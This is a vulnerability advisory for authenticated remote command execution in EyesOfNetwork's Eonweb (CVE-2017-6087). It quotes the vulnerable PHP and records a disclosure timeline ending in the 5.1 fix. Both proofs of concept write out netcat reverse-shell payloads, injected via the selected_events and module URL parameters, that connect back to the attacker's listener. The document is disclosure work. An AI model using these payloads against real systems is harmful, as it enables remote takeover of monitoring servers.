Description

EyesOfNetwork ("EON") is an OpenSource network monitoring solution.

Remote Code Execution (authenticated)

The Eonweb code does not correctly filter arguments, allowing authenticated users to execute arbitrary code.

CVE ID: CVE-2017-6087

Access Vector: remote

Security Risk: high

Vulnerability: CWE-78

CVSS Base Score: 7.6

CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Proof of Concept 1

On the attacker's host, we start a handler:

nc -lvp 1337

The selected_events parameter is not correctly filtered before it is used by the shell_exec() function.

There, it is possible to inject a payload like in the request below, where we connect back to our handler:

https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;

Vulnerable code

The payload gets injected into the $event[$key] and $ged_command variables of the module/monitoring_ged/ged_functions.php file, line 373:

$ged_command = "-update -type $ged_type_nbr ";
foreach ($array_ged_packets as $key => $value) {
  if($value["type"] == true){
    if($key == "owner"){
      $event[$key] = $owner;
    }
    $ged_command .= "\"".$event[$key]."\" ";
  }
}
$ged_command = trim($ged_command, " ");
shell_exec($path_ged_bin." ".$ged_command);

Two other functions in this file are also affected by this problem:

  • delete($selected_events, $queue);
  • ownDisown($selected_events, $queue, $global_action);

Proof of Concept 2

On the attacker's host, we start a handler:

nc -lvp 1337

The module parameter is not correctly filtered before it is used by the shell_exec() function.

Again, we inject our connecting back payload:

https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding

Vulnerable code

In the module/index.php file, line 24, we can see that our payload is injected into the exec() function without any sanitization:

# Check optionnal module to load
if(isset($_GET["module"]) && isset($_GET["link"])) {

    $module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");

    # Redirect to module page if rpm installed
    if($module!=0) { header('Location: '.$_GET["link"].''); }

}

Timeline (dd/mm/yyyy)

  • 01/10/2016 : Initial discovery.
  • 09/10/2016 : Fisrt contact with vendor.
  • 23/10/2016 : Technical details sent to the security contact.
  • 27/10/2016 : Vendor akwnoledgement and first patching attempt.
  • 11/10/2016 : Testing the patch revealed that it needed more work.
  • 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
  • 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our repsonsible disclosure agreement.
  • 14/03/2017 : Public disclosure.

Thank you to EON for the fast response.

Solution

Update to version 5.1

Affected versions

  • Version <= 5.0

Credits